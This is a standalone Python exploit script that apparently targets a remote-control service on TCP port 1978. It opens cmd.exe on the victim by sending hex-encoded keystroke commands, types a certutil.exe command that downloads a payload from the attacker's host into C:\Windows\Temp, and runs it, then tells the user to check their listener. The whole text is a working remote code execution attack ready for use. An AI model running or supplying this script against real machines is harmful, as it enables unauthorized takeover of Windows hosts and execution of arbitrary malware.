#!/usr/bin/python3 from socket import socket, AF_INET, SOCK_STREAM from time import sleep import sys target = socket(AF_INET, SOCK_STREAM) port = 1978 try: rhost = sys.argv[1] lhost = sys.argv[2] payload = sys.argv[3] except: print(f"USAGE: python3 {sys.argv[0]}

") sys.exit(1) characters = { "A":"41","B":"42","C":"43","D":"44","E":"45","F":"46","G":"47","H":"48","I":"49","J":"4a","K":"4b","L":"4c","M":"4d","N":"4e", "O":"4f","P":"50","Q":"51","R":"52","S":"53","T":"54","U":"55","V":"56","W":"57","X":"58","Y":"59","Z":"5a", "a":"61","b":"62","c":"63","d":"64","e":"65","f":"66","g":"67","h":"68","i":"69","j":"6a","k":"6b","l":"6c","m":"6d","n":"6e", "o":"6f","p":"70","q":"71","r":"72","s":"73","t":"74","u":"75","v":"76","w":"77","x":"78","y":"79","z":"7a", "1":"31","2":"32","3":"33","4":"34","5":"35","6":"36","7":"37","8":"38","9":"39","0":"30", " ":"20","+":"2b","=":"3d","/":"2f","_":"5f","<":"3c",">":"3e","[":"5b","]":"5d", "!":"21","@":"40","#":"23","$":"24","%":"25","^":"5e","&":"26","*":"2a", "(":"28",")":"29","-":"2d","'":"27",'"':"22",":":"3a",";":"3b","?":"3f","`":"60","~":"7e", "\\":"5c","|":"7c","{":"7b","}":"7d",",":"2c",".":"2e" } def send_hex(hexstr): target.sendall(bytes.fromhex(hexstr)) def openCMD(): # openfile /C/Windows/System32/cmd.exe send_hex("6f70656e66696c65202f432f57696e646f77732f53797374656d33322f636d642e6578650a") def SendString(s): for char in s: send_hex("7574663820" + characters[char] + "0a") sleep(0.03) def SendReturn(): # key 3RTN send_hex("6b657920203352544e") sleep(0.5) def exploit(): print("[+] 3..2..1..") sleep(2) openCMD() print("[+] *Super fast hacker typing*") sleep(1) SendString(f"certutil.exe -urlcache -f http://{lhost}/{payload} C:\\Windows\\Temp\\{payload}") SendReturn() print("[+] Retrieving payload") sleep(3) SendString(f"C:\\Windows\\Temp\\{payload}") SendReturn() print("[+] Done! Check your listener") def main(): target.connect((rhost, port)) exploit() target.close() if __name__ == "__main__": main()